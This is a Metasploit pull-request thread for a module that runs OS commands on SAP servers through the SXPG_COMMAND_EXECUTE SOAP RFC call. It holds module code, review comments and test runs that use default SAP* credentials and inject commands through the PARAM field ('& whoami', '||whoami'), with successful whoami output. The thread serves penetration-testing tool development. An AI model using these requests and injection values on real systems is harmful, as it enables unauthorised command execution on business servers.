
SAP SOAP RFC SXPG_COMMAND_EXECUTE #1037

Merged: 3 commits from nmonkee:sap_soap_rfc_sxpg_command_exec merged into rapid7:master on Nov 19, 2012

Contributor

nmonkee commented Nov 7, 2012

This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
+ )
+ register_options(
+ [
+ OptString.new('CLIENT', [true, 'Client', nil]),
+ OptString.new('USERNAME', [true, 'Username', nil]),
+ OptString.new('PASSWORD', [true, 'Password', nil]),
+ OptString.new('CMD', [true, 'Command to be executed', nil]),
+ OptString.new('PARAM', [false, 'Additional parameters', nil]),
+ OptEnum.new('OS', [true, 'Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']]),
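Review bot: 'Version' => '$Revision' is an unexpanded keyword placeholder (it lacks even the closing $) and the framework no longer reads this field, so remove the line rather than fix it. The CMD option text 'Command to be executed' is misleading: per the Description, CMD has to be the name of an external command already defined in SM69, not an arbitrary OS command, so say so in the option description (e.g. 'SM69 external command name').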
@brandonprry

brandonprry Nov 9, 2012

Contributor

Trailing comma

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ data << '</n1:SXPG_COMMAND_EXECUTE>'
+ data << '</env:Body>'
+ data << '</env:Envelope>'
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
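Review bot: datastore['CLIENT'] is concatenated unescaped into both the request path ('/sap/bc/soap/rfc?sap-client=' ...) and the Cookie header; a value containing '&' or whitespace would corrupt the query string and the sap-usercontext cookie. Validate it as the three-digit client number the option describes, or pass it through Rex::Text.uri_encode before building the URI and cookie.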
@brandonprry

brandonprry Nov 9, 2012

Contributor

Trailing comma

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if (res and res.code != 500 and res.code != 200)
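Review bot: the condition `if (res and res.code != 500 and res.code != 200)` sends a nil res (send_request_raw returns nil on timeout, 45 s here) into the else branch, where res.body is then dereferenced; test `res.nil?` first and return with a timeout message, then compare the code. Ruby style also drops the parentheses around the condition.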
@brandonprry

brandonprry Nov 9, 2012

Contributor

if res and res.code != 500 and res.code != 200

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
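Review bot: the fault branch sets `sucess = false` (typo) while the check below reads `success == true`, so a SOAP Fault never changes the flag and the fault text is never reported; rename it to `success` and initialise the flag once before the request. The `for i in 0..output.length-1` loop over the scan result is better written `output.each { |line| saptbl << [line] }`.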
@brandonprry

brandonprry Nov 9, 2012

Contributor

if success

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
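Review bot: `if success == true` and `if sucess == false` are two independent tests of what is meant to be one flag; because `success` is set true before the body is parsed, a faulting response both prints an empty table and enters the error block. Keep a single flag, set it false in the faultstring branch, and use one if/else.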
@brandonprry

brandonprry Nov 9, 2012

Contributor

You have two options here.

Since success is boolean, it has only two values, and a simple else should suffice instead of re-evaluating success (which is also a typo).

However, since this assumes success is boolean, being explicit could be appropriate with an elsif !success

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
+ for i in 0..error.length-1
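Review bot: `error` comes straight from `<faultstring>(.*?)</faultstring>` and keeps the whitespace SAP pads that element with (' Internal Server Error ' in the response quoted later in this thread), so strip each entry before printing, and iterate with `error.each` instead of indexing `0..error.length-1`. The `<type>` and `<message>` elements of the rfc:Error detail (e.g. TH_RES_FREE) say more than the generic faultstring and are worth extracting too.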
@brandonprry

brandonprry Nov 9, 2012

Contributor

0.upto(error.length-1) do |i|

Contributor

jvazquez-r7 commented Nov 14, 2012

msftidy warnings should be fixed:

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
sap_soap_rfc_sxpg_command_exec.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_command_exec.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:48 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:119 - [WARNING] Spaces at EOL

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
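Review bot: Msf::Auxiliary::Report is included, but none of the hunks shown call report_note or store_loot; either record the command output with report_note/store_loot so results survive the console session, or drop the include.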
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Version field isn't needed anymore

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
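Review bot: the Description should spell out the prerequisites the options imply, namely valid SAP credentials for the given CLIENT and an external command already defined in SM69, so the module reads as an authenticated command-execution helper rather than a vulnerability check; wrap the text at under 100 columns as well.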
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Please avoid lines of more than 100 columns in the description field.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
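Review bot: the single 'URL' reference is a lab homepage, not documentation of the technique; point instead at the MWR write-up of these RFC modules linked later in this thread (http://labs.mwrinfosecurity.com/blog/2012/04/27/mwr-sap-metasploit-modules) and/or SAP's documentation of SXPG_COMMAND_EXECUTE and SM69 external commands.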
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Only references to the specific technique used in the module, pls.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
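Review bot: 'License' => BSD_LICENSE diverges from the MSF_LICENSE used by framework modules; unless there is a reason for BSD, use MSF_LICENSE. The author array `[ 'Agnivesh Sathasivam','nmonkee' ]` also needs a space after the comma.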
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Can MSF_LICENSE be used?

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
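Review bot: the table header string "[SAP] SXPG_COMMAND_EXECUTE " carries a trailing space, and 'Columns' =>["Output",] has a trailing comma and no space after =>; tidy both. The `rescue ::Rex::ConnectionError` line is indented to a different level from its begin, and it only catches connection failures: a timeout makes send_request_raw return nil rather than raise, so nil still has to be handled separately.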
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Indentation for this rescue should be fixed.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ if (res and res.code != 500 and res.code != 200)
+ # to do - implement error handlers for each status code, 404, 301, etc.
+ print_error("[SAP] #{ip}:#{rport} - something went wrong!")
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
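Review bot: the error branch collapses every unexpected status into "something went wrong!"; include res.code in the message (a 401 points at rejected credentials, a 404 at a missing handler), which also makes the TODO about per-status handlers unnecessary. Because the condition starts with `res and`, a nil res skips this branch and reaches res.body below, so add an explicit nil check first.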
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

I think res should be checked against nil before using it here.

Contributor

jvazquez-r7 commented Nov 14, 2012

If you're able to execute OS commands it could be converted to an exploit.

Contributor

jvazquez-r7 commented Nov 18, 2012

No luck running it:

  • First try:
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   CMD       ENV              yes       Command to be executed
   OS        Windows NT       yes       Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
   PARAM                      no        Additional parameters
   PASSWORD  admin1234        yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS    192.168.1.160    yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.1.160:8000 - got response
[-] Auxiliary failed: NoMethodError undefined method `scan' for nil:NilClass
[-] Call stack:
[-]   /Users/juan/Projects/metasploit-framework/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb:101:in `run_host'
[-]   /Users/juan/Projects/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:94:in `block in run'
[-]   /Users/juan/Projects/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `call'
[-]   /Users/juan/Projects/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed

I can solve the exception by myself when doing the last cleanup, but trying to put a bigger timeout for send_request_raw:

    res = send_request_raw({
      'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
      'method' => 'POST',
      'data' => data,
      'headers' => {
        'Content-Length' => data.size.to_s,
        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
        'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
        'Authorization' => 'Basic ' + user_pass,
        'Content-Type' => 'text/xml; charset=UTF-8'
      }
    }, 100)

I just get:

msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
^[[B[*] [SAP] 192.168.1.160:8000 - got response
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Inspecting the response, it's a HTTP 500:

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode> SOAP-ENV:Client </faultcode><faultstring> Internal Server Error </faultstring><detail><rfc:Error xmlns:rfc="urn:sap-com:document:sap:soap:functions"><type>TH_RES_FREE</type><message>Work process restarted; session terminated                               </message></rfc:Error></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>

I've checked that the ENV cmd exists in the SM69 transaction.

Maybe SAP needs some additional configuration... Am I forgetting something?

Contributor

nmonkee commented Nov 18, 2012

In SM69 does the command ENV exist?

Aren't you running on Linux?

Try:

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
CMD=LIST_DB2DUMP OS=2 PARAM="/etc/passwd" E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: LIST_DB2DUMP /etc/passwd

[SAP] Command Exec

Output

-rw-r--r-- 1 root root 1669 2011-11-02 12:58 /etc/passwd

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Contributor

nmonkee commented Nov 18, 2012

An example run for all RFC modules can be found here: http://labs.mwrinfosecurity.com/blog/2012/04/27/mwr-sap-metasploit-modules

The SOAP modules are all the same.

Contributor

jvazquez-r7 commented Nov 18, 2012

In SM69 does the command ENV exist?

  • Yes

Aren't you running on Linux?

  • No, Windows finally

(Yes, I'd checked http://labs.mwrinfosecurity.com/blog/2012/04/27/mwr-sap-metasploit-modules , thanks for pointing it out :))

Contributor

nmonkee commented Nov 18, 2012

Curious. Can you try list_db2dump?

Can you try ENV with additional PARAM of & whoami

Contributor

jvazquez-r7 commented Nov 18, 2012

Can you try list_db2dump?

  • sure, result (with a dump of the response received):
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   CMD       LIST_DB2DUMP     yes       Command to be executed
   OS        Windows NT       yes       Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
   PARAM                      no        Additional parameters
   PASSWORD  admin1234        yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS    192.168.1.160    yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.1.160:8000 - got response
[*] 500
  SOAP-ENV:Client  Internal Server Error TH_RES_FREEWork process restarted; session terminated                               
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Can you try ENV with additional PARAM of & whoami

  • sure, result:
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > set CMD ENV
CMD => ENV
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > set PARAM & whoami
PARAM => & whoami
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   CMD       ENV              yes       Command to be executed
   OS        Windows NT       yes       Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
   PARAM     & whoami         no        Additional parameters
   PASSWORD  admin1234        yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS    192.168.1.160    yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.1.160:8000 - got response
[*] 500
  SOAP-ENV:Client  Internal Server Error RABAX_STATEAn error occurred during the receipt of a complex parameter.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

(in both tests timeout of send_request_raw is 100)

Contributor

nmonkee commented Nov 19, 2012

O.k., I'll have to fire up my VM and test tomorrow. I'll get back to you. Can you exec those manually via the GUI in SM69/SM49?

Contributor

jvazquez-r7 commented Nov 19, 2012

yup, same error message when running a command from the SM69 transaction:

Work process restarted; session terminated

Did you find it before? Or maybe it is related to something wrong in my SAP installation?

Contributor

nmonkee commented Nov 19, 2012

Sounds like a SAP set up issue. I'll look into it.

Contributor

jvazquez-r7 commented Nov 19, 2012

Really thanks!

Contributor

nmonkee commented Nov 19, 2012

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):

Name Current Setting Required Description


CLIENT 000 yes Client
CMD LIST_DB2DUMP yes Command to be executed
OS Windows NT yes Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
PARAM c:\ no Additional parameters
PASSWORD 06071992 yes Password
Proxies no Use a proxy chain
RHOSTS 10.0.7.27 yes The target address range or CIDR identifier
RPORT 8000 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME SAP* yes Username
VHOST no HTTP server virtual host

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[*] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 10.0.7.27:8000 - got response

[SAP] SXPG_COMMAND_EXECUTE

Output


              3 File(s)         10,156 bytes
              7 Dir(s)  17,175,728,128 bytes free
Directory of c:\
Volume Serial Number is 6450-5096
Volume in drive C has no label.

04/10/2012 09:07 PM <DIR> Users
05/21/2011 12:13 AM 1,830 unattend.xml
05/22/2011 09:04 PM <DIR> sqlinstall
05/22/2011 10:02 PM 176 completesql.cmd
05/23/2011 01:23 AM 8,150 sqlcompleteconfig.ini
07/14/2009 03:20 AM <DIR> PerfLogs
08/16/2012 07:39 PM <DIR> Program Files
08/22/2012 09:33 AM <DIR> Windows
09/08/2012 10:26 PM <DIR> AAA
10/28/2011 08:29 AM <DIR> Program Files (x86)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Contributor

nmonkee commented Nov 19, 2012

I do think there is an issue with sending the ampersand (&) though.

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > set PARAM "C:\windows\win.ini&whoami"
PARAM => C:\windows\win.ini&whoami
msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[*] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request

env:BodyC:\windows\win.ini&whoami DISPLAY_DIAGLOGWindows NT/n1:SXPG_COMMAND_EXECUTE/env:Body/env:Envelope[*] [SAP] 10.0.7.27:8000 - got response

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

set PARAM "C:\windows\win.ini||whoami"
PARAM => C:\windows\win.ini||whoami
msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[*] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request

env:BodyC:\windows\win.ini||whoami DISPLAY_DIAGLOGWindows NT/n1:SXPG_COMMAND_EXECUTE/env:Body/env:Envelope[*] [SAP] 10.0.7.27:8000 - got response

[SAP] SXPG_COMMAND_EXECUTE

Output


; for 16-bit app support
MAPI=1
[Mail]
[extensions]
[files]
[fonts]
[mci extensions]

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Contributor

nmonkee commented Nov 19, 2012

Must enter ampersand as &amp;

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):

Name Current Setting Required Description


CLIENT 000 yes Client
CMD DISPLAY_DIAGLOG yes Command to be executed
OS Windows NT yes Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
PARAM &whoami no Additional parameters
PASSWORD 06071992 yes Password
Proxies no Use a proxy chain
RHOSTS 10.0.7.27 yes The target address range or CIDR identifier
RPORT 8000 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME SAP* yes Username
VHOST no HTTP server virtual host

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[*] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 10.0.7.27:8000 - got response

[SAP] SXPG_COMMAND_EXECUTE

Output


The syntax of the command is incorrect.
gateway\administrator

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
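The response handling discussed in the review (nil body, the success/sucess typo, the rfc:Error type hidden behind the generic faultstring) and the ampersand escaping from this comment, as one added Ruby example that is not the module's code and not part of this pull request. The function names, the SapRfcResult struct and the element layout of the success envelope are assumptions; the sample bodies are constructed from fragments quoted in the thread.

```ruby
# Added example, not the module's own code: classify the SOAP reply of the
# SAP /sap/bc/soap/rfc handler (SOAP Fault vs. <MESSAGE> rows vs. empty
# body) without the nil-body crash and the success/sucess typo discussed
# in the review, and XML-escape a parameter so that an "&" travels as "&amp;".
# The sample responses below are constructed from fragments quoted in the
# thread; the element layout of the success envelope is an assumption.

# The five XML special characters and their entity references.
XML_ESCAPES = {
  '&' => '&amp;', '<' => '&lt;', '>' => '&gt;', '"' => '&quot;', "'" => '&apos;'
}.freeze

# Escape a value for use as element text inside the SOAP body.
def xml_escape(value)
  value.to_s.gsub(/[&<>"']/) { |c| XML_ESCAPES[c] }
end

# status is one of :empty, :http_error, :fault or :output
SapRfcResult = Struct.new(:status, :http_code, :fault_code, :fault_type,
                          :fault_message, :output)

# First capture group of pattern in body, whitespace stripped, or nil.
def first_match(body, pattern)
  m = body.match(pattern)
  m ? m[1].strip : nil
end

# Turn an HTTP status code and response body into a SapRfcResult.
def parse_sxpg_response(http_code, body)
  # A timeout or reset leaves no usable body: report that instead of
  # calling body.scan on nil (the NoMethodError seen in the thread).
  if http_code.nil? || body.nil? || body.strip.empty?
    return SapRfcResult.new(:empty, http_code, nil, nil, nil, [])
  end
  # The handler answers 200 for a normal call and 500 for a SOAP Fault;
  # anything else is an HTTP-level problem worth reporting with its code.
  unless [200, 500].include?(http_code)
    return SapRfcResult.new(:http_error, http_code, nil, nil, nil, [])
  end
  if body.include?('<faultstring>')
    # The rfc:Error detail carries the ABAP error class (e.g. TH_RES_FREE),
    # which says more than the generic "Internal Server Error" faultstring.
    message = first_match(body, %r{<message>(.*?)</message>}m) ||
              first_match(body, %r{<faultstring>(.*?)</faultstring>}m)
    return SapRfcResult.new(:fault, http_code,
                            first_match(body, %r{<faultcode>(.*?)</faultcode>}m),
                            first_match(body, %r{<type>(.*?)</type>}m),
                            message, [])
  end
  # Normal reply: every <MESSAGE> element is one line of command output.
  rows = body.scan(%r{<MESSAGE>([^<]*)</MESSAGE>}).flatten.map(&:rstrip)
  SapRfcResult.new(:output, http_code, nil, nil, nil, rows)
end

# Constructed sample: the HTTP 500 TH_RES_FREE fault quoted in the thread.
SAMPLE_FAULT = <<~'XML'
  <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode> SOAP-ENV:Client </faultcode><faultstring> Internal Server Error </faultstring><detail><rfc:Error xmlns:rfc="urn:sap-com:document:sap:soap:functions"><type>TH_RES_FREE</type><message>Work process restarted; session terminated      </message></rfc:Error></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
XML

# Constructed sample of a successful call (element layout assumed); the two
# rows are the output lines shown for the "&whoami" run above.
SAMPLE_OUTPUT = <<~'XML'
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><n1:SXPG_COMMAND_EXECUTE.Response xmlns:n1="urn:sap-com:document:sap:rfc:functions"><EXEC_PROTOCOL><item><MESSAGE>The syntax of the command is incorrect.</MESSAGE></item><item><MESSAGE>gateway\administrator</MESSAGE></item></EXEC_PROTOCOL></n1:SXPG_COMMAND_EXECUTE.Response></SOAP-ENV:Body></SOAP-ENV:Envelope>
XML

if __FILE__ == $PROGRAM_NAME
  puts xml_escape('C:\windows\win.ini&whoami')   # C:\windows\win.ini&amp;whoami
  p parse_sxpg_response(500, SAMPLE_FAULT)
  p parse_sxpg_response(200, SAMPLE_OUTPUT)
end
```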

Contributor

nmonkee commented Nov 19, 2012

Have you licensed the server?

Contributor

jvazquez-r7 commented Nov 19, 2012

It's using the installation's temporary license, should that be a problem?

Contributor

nmonkee commented Nov 19, 2012

iirc, I had to request a licence. So long ago now though.

But if you log in via the GUI into client 001 or 066 as SAP* you should get an error about the licence iirc. If you don't get that then that's not the issue.

Try against client 000 as SAP*?

As SAP* you shouldn't have any issue in SM49 or SM69 from executing any of the commands there.

Contributor

jvazquez-r7 commented Nov 19, 2012

Hi nmonkee, with the hope of accelerating things, I've made the following pull request to your repo and branch:

nmonkee#1

If you could test it in your installation (if you have Windows/Linux, that would be awesome), send a network capture to juan.vazquez [at] metasploit.com, and update this pull request with msfconsole output, I'll feel confident to merge it :)

If after testing my changes, it's working please land it, so this pull request will be automatically updated and we'll be able to merge it ! :)

I hope you don't get annoyed; feel free to ask me if there is any doubt about the procedure!

Thanks in advance!

juan

Contributor

